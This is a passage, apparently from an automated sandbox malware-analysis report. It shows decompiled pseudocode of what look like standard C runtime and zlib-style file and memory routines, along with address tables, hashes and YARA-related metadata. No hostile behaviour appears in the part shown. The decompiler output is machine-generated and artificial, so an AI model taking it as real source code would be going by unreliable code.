									_t79 = E0040B80D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BF81(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C913(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB5D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00404FB0(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8A5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

































                                                                                                            0x00405767
                                                                                                            0x0040576f
                                                                                                            0x00405773
                                                                                                            0x00405775
                                                                                                            0x0040577d
                                                                                                            0x00405978
                                                                                                            0x0040597e
                                                                                                            0x0040578b
                                                                                                            0x00405793
                                                                                                            0x00405795
                                                                                                            0x0040579a
                                                                                                            0x004058d1
                                                                                                            0x004058da
                                                                                                            0x004057a0
                                                                                                            0x004057a3
                                                                                                            0x004057a6
                                                                                                            0x004057a9
                                                                                                            0x004057ac
                                                                                                            0x004057af
                                                                                                            0x004057b1
                                                                                                            0x004057b4
                                                                                                            0x004057b7
                                                                                                            0x004057ba
                                                                                                            0x004057bd
                                                                                                            0x004057c0
                                                                                                            0x004057c3
                                                                                                            0x004057c6
                                                                                                            0x004057c9
                                                                                                            0x004057cc
                                                                                                            0x004057d4
                                                                                                            0x004057d7
                                                                                                            0x004057db
                                                                                                            0x004057de
                                                                                                            0x004057e1
                                                                                                            0x004057e4
                                                                                                            0x004057e7
                                                                                                            0x004057e7
                                                                                                            0x004057e9
                                                                                                            0x004057ea
                                                                                                            0x004057f2
                                                                                                            0x004057f7
                                                                                                            0x004057fa
                                                                                                            0x004057ff
                                                                                                            0x004058cc
                                                                                                            0x004058cc
                                                                                                            0x00000000
                                                                                                            0x00405805
                                                                                                            0x00405805
                                                                                                            0x00405809
                                                                                                            0x0040580b
                                                                                                            0x00000000
                                                                                                            0x00405820
                                                                                                            0x00405822
                                                                                                            0x00405824
                                                                                                            0x00405824
                                                                                                            0x00405827
                                                                                                            0x0040582b
                                                                                                            0x00405831
                                                                                                            0x00405831
                                                                                                            0x00405835
                                                                                                            0x00405839
                                                                                                            0x00405847
                                                                                                            0x00405849
                                                                                                            0x00405855
                                                                                                            0x00405857
                                                                                                            0x00405863
                                                                                                            0x00405865
                                                                                                            0x00405871
                                                                                                            0x00405875
                                                                                                            0x00405877
                                                                                                            0x00405877
                                                                                                            0x00405878
                                                                                                            0x00405867
                                                                                                            0x00405867
                                                                                                            0x00405867
                                                                                                            0x00405859
                                                                                                            0x00405859
                                                                                                            0x00405859
                                                                                                            0x0040584b
                                                                                                            0x0040584b
                                                                                                            0x0040584b
                                                                                                            0x0040583f
                                                                                                            0x00405842
                                                                                                            0x00405842
                                                                                                            0x0040587c
                                                                                                            0x0040587f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405881
                                                                                                            0x00405889
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040588b
                                                                                                            0x0040588b
                                                                                                            0x00405890
                                                                                                            0x00000000
                                                                                                            0x00405892
                                                                                                            0x00405894
                                                                                                            0x004058e0
                                                                                                            0x004058ef
                                                                                                            0x004058f2
                                                                                                            0x004058f4
                                                                                                            0x004058f9
                                                                                                            0x004058fc
                                                                                                            0x004058fe
                                                                                                            0x00000000
                                                                                                            0x00405900
                                                                                                            0x00405900
                                                                                                            0x00405903
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405903
                                                                                                            0x00405896
                                                                                                            0x0040589a
                                                                                                            0x0040589c
                                                                                                            0x004058a1
                                                                                                            0x004058a2
                                                                                                            0x004058a4
                                                                                                            0x004058a6
                                                                                                            0x004058a8
                                                                                                            0x004058a9
                                                                                                            0x004058b4
                                                                                                            0x004058b6
                                                                                                            0x004058bb
                                                                                                            0x004058be
                                                                                                            0x004058c1
                                                                                                            0x004058c6
                                                                                                            0x00000000
                                                                                                            0x00405905
                                                                                                            0x00405905
                                                                                                            0x00405905
                                                                                                            0x00405911
                                                                                                            0x00405913
                                                                                                            0x00405917
                                                                                                            0x0040591d
                                                                                                            0x0040591e
                                                                                                            0x0040592c
                                                                                                            0x0040592d
                                                                                                            0x00405920
                                                                                                            0x00405920
                                                                                                            0x00405924
                                                                                                            0x00405925
                                                                                                            0x00405925
                                                                                                            0x00405935
                                                                                                            0x00405938
                                                                                                            0x0040593a
                                                                                                            0x00000000
                                                                                                            0x0040593c
                                                                                                            0x0040593c
                                                                                                            0x00405940
                                                                                                            0x00405955
                                                                                                            0x0040595d
                                                                                                            0x00405966
                                                                                                            0x00405966
                                                                                                            0x00405969
                                                                                                            0x00405975
                                                                                                            0x00405942
                                                                                                            0x00405942
                                                                                                            0x00405952
                                                                                                            0x00405952
                                                                                                            0x00405940
                                                                                                            0x0040593a
                                                                                                            0x004058c6
                                                                                                            0x00405894
                                                                                                            0x00000000
                                                                                                            0x00405810
                                                                                                            0x00405810
                                                                                                            0x00405812
                                                                                                            0x00405814
                                                                                                            0x00405815
                                                                                                            0x00405818
                                                                                                            0x00000000
                                                                                                            0x0040581a
                                                                                                            0x0040581a
                                                                                                            0x0040581d
                                                                                                            0x00000000
                                                                                                            0x00405818
                                                                                                            0x004057ff
                                                                                                            0x0040579a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 0040578E
                                                                                                              • Part of subcall function 0040B80D: __FF_MSGBANNER.LIBCMT ref: 0040B830
                                                                                                              • Part of subcall function 0040B80D: __NMSG_WRITE.LIBCMT ref: 0040B837
                                                                                                              • Part of subcall function 0040B80D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C46,00000001,00000001,00000001,?,0040D62A,00000018,00421240,0000000C,0040D6BB), ref: 0040B884
                                                                                                            • _malloc.LIBCMT ref: 004057F2
                                                                                                            • _malloc.LIBCMT ref: 004058B6
                                                                                                            • _malloc.LIBCMT ref: 004058E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                            • String ID: 1.2.3
                                                                                                            • API String ID: 680241177-2310465506
                                                                                                            • Opcode ID: dfd483211e98a9fc01e56de2bcc6dd101e7a29c5b9e150e799f8308f93a351f4
                                                                                                            • Instruction ID: d33edc5f4644e391b8b4222eb6447303ef68805c976fd54f75bf396b81ad9fa3
                                                                                                            • Opcode Fuzzy Hash: dfd483211e98a9fc01e56de2bcc6dd101e7a29c5b9e150e799f8308f93a351f4
                                                                                                            • Instruction Fuzzy Hash: 3461F8B2944B418FC720AF2A848065BBBE0FB45314F50893FE9D9A3780D739D8498F5A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040BC82, Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E0040BC82(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040B9F0(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FBC7(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040B9F0(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BF81(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E704(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040F9E0(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102B4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040B9F0(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BF81(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103B1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BF81(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                                                                                                            0x0040bc82
                                                                                                            0x0040bc8a
                                                                                                            0x0040bc8e
                                                                                                            0x0040bc93
                                                                                                            0x0040bc95
                                                                                                            0x0040bc98
                                                                                                            0x0040bc9e
                                                                                                            0x0040bcc1
                                                                                                            0x00000000
                                                                                                            0x0040bca5
                                                                                                            0x0040bca5
                                                                                                            0x0040bca7
                                                                                                            0x0040bcc8
                                                                                                            0x0040bccb
                                                                                                            0x0040bccd
                                                                                                            0x0040bcdc
                                                                                                            0x0040bcdc
                                                                                                            0x0040bcdf
                                                                                                            0x0040bce4
                                                                                                            0x0040bce9
                                                                                                            0x0040bce9
                                                                                                            0x0040bcec
                                                                                                            0x0040bcee
                                                                                                            0x00000000
                                                                                                            0x0040bcf0
                                                                                                            0x0040bcf0
                                                                                                            0x0040bcf5
                                                                                                            0x0040bcf8
                                                                                                            0x0040bcfb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040bcfd
                                                                                                            0x0040bd00
                                                                                                            0x0040bd04
                                                                                                            0x0040bd0b
                                                                                                            0x0040bd0e
                                                                                                            0x0040bd10
                                                                                                            0x0040bd1a
                                                                                                            0x0040bd12
                                                                                                            0x0040bd15
                                                                                                            0x0040bd15
                                                                                                            0x0040bd21
                                                                                                            0x0040bd23
                                                                                                            0x0040be13
                                                                                                            0x00000000
                                                                                                            0x0040bd29
                                                                                                            0x0040bd29
                                                                                                            0x0040bd29
                                                                                                            0x0040bd30
                                                                                                            0x0040bd76
                                                                                                            0x0040bd76
                                                                                                            0x0040bd79
                                                                                                            0x0040bde4
                                                                                                            0x0040bdea
                                                                                                            0x0040bded
                                                                                                            0x0040be78
                                                                                                            0x00000000
                                                                                                            0x0040be7e
                                                                                                            0x0040bdf3
                                                                                                            0x0040bdf7
                                                                                                            0x0040be47
                                                                                                            0x0040be47
                                                                                                            0x0040be4b
                                                                                                            0x0040be55
                                                                                                            0x0040be5a
                                                                                                            0x0040be5a
                                                                                                            0x0040be62
                                                                                                            0x0040be6a
                                                                                                            0x0040be6b
                                                                                                            0x0040be6c
                                                                                                            0x0040be6d
                                                                                                            0x0040be6e
                                                                                                            0x0040bcb9
                                                                                                            0x0040bcb9
                                                                                                            0x00000000
                                                                                                            0x0040bcbe
                                                                                                            0x0040bdf9
                                                                                                            0x0040bdfc
                                                                                                            0x0040bdff
                                                                                                            0x0040be04
                                                                                                            0x0040be05
                                                                                                            0x0040be05
                                                                                                            0x0040be05
                                                                                                            0x0040be08
                                                                                                            0x00000000
                                                                                                            0x0040be08
                                                                                                            0x0040bd7b
                                                                                                            0x0040bd7f
                                                                                                            0x0040bda0
                                                                                                            0x0040bda5
                                                                                                            0x0040bda7
                                                                                                            0x0040bda9
                                                                                                            0x0040bda9
                                                                                                            0x0040bd81
                                                                                                            0x0040bd88
                                                                                                            0x0040bd8a
                                                                                                            0x0040bd97
                                                                                                            0x0040bd97
                                                                                                            0x0040bd97
                                                                                                            0x0040bd9a
                                                                                                            0x0040bd8c
                                                                                                            0x0040bd8e
                                                                                                            0x0040bd91
                                                                                                            0x0040bd91
                                                                                                            0x0040bd9c
                                                                                                            0x0040bd9c
                                                                                                            0x0040bdab
                                                                                                            0x0040bdae
                                                                                                            0x00000000
                                                                                                            0x0040bdb4
                                                                                                            0x0040bdb4
                                                                                                            0x0040bdb5
                                                                                                            0x0040bdb9
                                                                                                            0x0040bdbe
                                                                                                            0x0040bdbf
                                                                                                            0x0040bdc0
                                                                                                            0x0040bdc5
                                                                                                            0x0040bdc8
                                                                                                            0x0040bdca
                                                                                                            0x0040be86
                                                                                                            0x00000000
                                                                                                            0x0040be86
                                                                                                            0x0040bdd0
                                                                                                            0x0040bdd3
                                                                                                            0x0040be74
                                                                                                            0x0040be74
                                                                                                            0x0040be74
                                                                                                            0x0040be74
                                                                                                            0x00000000
                                                                                                            0x0040be74
                                                                                                            0x0040bdd9
                                                                                                            0x0040bddc
                                                                                                            0x0040bdde
                                                                                                            0x00000000
                                                                                                            0x0040bdde
                                                                                                            0x0040bdae
                                                                                                            0x0040bd32
                                                                                                            0x0040bd35
                                                                                                            0x0040bd37
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040bd39
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040bd3f
                                                                                                            0x0040bd41
                                                                                                            0x0040bd43
                                                                                                            0x0040bd45
                                                                                                            0x0040bd45
                                                                                                            0x0040bd47
                                                                                                            0x0040bd4a
                                                                                                            0x0040be1b
                                                                                                            0x0040be1d
                                                                                                            0x0040be21
                                                                                                            0x0040be2a
                                                                                                            0x0040be2f
                                                                                                            0x0040be2f
                                                                                                            0x0040be32
                                                                                                            0x0040be37
                                                                                                            0x0040be38
                                                                                                            0x0040be39
                                                                                                            0x0040be3a
                                                                                                            0x0040be3b
                                                                                                            0x0040be41
                                                                                                            0x00000000
                                                                                                            0x0040bd50
                                                                                                            0x0040bd59
                                                                                                            0x0040bd5e
                                                                                                            0x0040bd61
                                                                                                            0x0040bd63
                                                                                                            0x0040bd66
                                                                                                            0x0040bd68
                                                                                                            0x0040bd6b
                                                                                                            0x0040bd6e
                                                                                                            0x0040bd6e
                                                                                                            0x0040be0b
                                                                                                            0x0040be0b
                                                                                                            0x0040be0b
                                                                                                            0x00000000
                                                                                                            0x0040bd29
                                                                                                            0x0040bd23
                                                                                                            0x0040bcee
                                                                                                            0x0040bccf
                                                                                                            0x0040bcd4
                                                                                                            0x0040bcd4
                                                                                                            0x0040bcd7
                                                                                                            0x0040bcda
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040bcda
                                                                                                            0x0040bca9
                                                                                                            0x0040bca9
                                                                                                            0x0040bcae
                                                                                                            0x0040bcaf
                                                                                                            0x0040bcb0
                                                                                                            0x0040bcb1
                                                                                                            0x0040bcb2
                                                                                                            0x0040bcb8
                                                                                                            0x00000000
                                                                                                            0x0040bcb8

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 3886058894-0
                                                                                                            • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                            • Instruction ID: ac71b8413edd5c82999a863e1080af1727f4c3550edc762b5dddd404fb77a0c7
                                                                                                            • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                            • Instruction Fuzzy Hash: 3551E030900605EBDB219F6AC84499FBB74EF91324F24863BE825B22D1D7788E51CBDD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004146F8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E004146F8(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E198(__ebx, __edi, __esi);
				_t28 = E004106F5(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6A0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146BA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E00414762();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E004106F5(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E75A(_t25, _t26, 0x20);
				}
				return E0040E1DD(_t28);
			}







                                                                                                            0x004146f8
                                                                                                            0x004146f8
                                                                                                            0x004146f8
                                                                                                            0x004146f8
                                                                                                            0x004146f8
                                                                                                            0x004146fa
                                                                                                            0x004146ff
                                                                                                            0x00414709
                                                                                                            0x0041470b
                                                                                                            0x00414713
                                                                                                            0x00414737
                                                                                                            0x00414739
                                                                                                            0x0041473f
                                                                                                            0x00414743
                                                                                                            0x00414746
                                                                                                            0x00414751
                                                                                                            0x00414754
                                                                                                            0x0041475b
                                                                                                            0x00414715
                                                                                                            0x00414715
                                                                                                            0x00414719
                                                                                                            0x00000000
                                                                                                            0x0041471b
                                                                                                            0x00414720
                                                                                                            0x00414720
                                                                                                            0x00414719
                                                                                                            0x00414725
                                                                                                            0x00414729
                                                                                                            0x0041472e
                                                                                                            0x00414736

                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 00414704
                                                                                                              • Part of subcall function 004106F5: __getptd_noexit.LIBCMT ref: 004106F8
                                                                                                              • Part of subcall function 004106F5: __amsg_exit.LIBCMT ref: 00410705
                                                                                                            • __getptd.LIBCMT ref: 0041471B
                                                                                                            • __amsg_exit.LIBCMT ref: 00414729
                                                                                                            • __lock.LIBCMT ref: 00414739
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                            • String ID: @.B
                                                                                                            • API String ID: 3521780317-470711618
                                                                                                            • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                            • Instruction ID: 79052d33ef1135b751d7225a88192fb2588a7deb6a586739662bc9de74a94e56
                                                                                                            • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                            • Instruction Fuzzy Hash: D8F0BB31A40300DBD720BF769A0278D73A0AF82759F51452FE554673D1CB7C5C819B5D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040C6FD, Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E0040C6FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E198(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FAE9(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040F9E0(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040F9E0(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040F9E0(__edx, _t39, _t39);
							_t17 = ((E0040F9E0(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C6F5(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BF81(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E704(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E1DD(_t19);
			}













                                                                                                            0x0040c6fd
                                                                                                            0x0040c650
                                                                                                            0x0040c652
                                                                                                            0x0040c657
                                                                                                            0x0040c65e
                                                                                                            0x0040c663
                                                                                                            0x0040c668
                                                                                                            0x0040c66a
                                                                                                            0x0040c688
                                                                                                            0x0040c68e
                                                                                                            0x0040c691
                                                                                                            0x0040c696
                                                                                                            0x0040c69c
                                                                                                            0x0040c69f
                                                                                                            0x0040c6cf
                                                                                                            0x0040c6cf
                                                                                                            0x0040c6a1
                                                                                                            0x0040c6a2
                                                                                                            0x0040c6a8
                                                                                                            0x0040c6ab
                                                                                                            0x00000000
                                                                                                            0x0040c6ad
                                                                                                            0x0040c6ae
                                                                                                            0x0040c6cb
                                                                                                            0x0040c6cb
                                                                                                            0x0040c6ab
                                                                                                            0x0040c6d4
                                                                                                            0x0040c6db
                                                                                                            0x0040c6de
                                                                                                            0x0040c6e5
                                                                                                            0x0040c6ea
                                                                                                            0x0040c6ea
                                                                                                            0x0040c66c
                                                                                                            0x0040c66c
                                                                                                            0x0040c673
                                                                                                            0x0040c674
                                                                                                            0x0040c676
                                                                                                            0x0040c677
                                                                                                            0x0040c678
                                                                                                            0x0040c679
                                                                                                            0x0040c67a
                                                                                                            0x0040c67b
                                                                                                            0x0040c683
                                                                                                            0x0040c683
                                                                                                            0x0040c6f1

                                                                                                            APIs
                                                                                                            • __lock_file.LIBCMT ref: 0040C688
                                                                                                            • __fileno.LIBCMT ref: 0040C696
                                                                                                            • __fileno.LIBCMT ref: 0040C6A2
                                                                                                            • __fileno.LIBCMT ref: 0040C6AE
                                                                                                            • __fileno.LIBCMT ref: 0040C6BE
                                                                                                              • Part of subcall function 0040BF81: __getptd_noexit.LIBCMT ref: 0040BF81
                                                                                                              • Part of subcall function 0040E704: __decode_pointer.LIBCMT ref: 0040E70F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                            • String ID:
                                                                                                            • API String ID: 2805327698-0
                                                                                                            • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                            • Instruction ID: 786f84aace4917180e7cee59198264963d6d2b88aa508154f7c37596672afae2
                                                                                                            • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                            • Instruction Fuzzy Hash: FC014873114610A7C231677A5CC353F76A08A817347364B3FF020BB2E2DA3DC902969E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00413F8C, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E00413F8C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
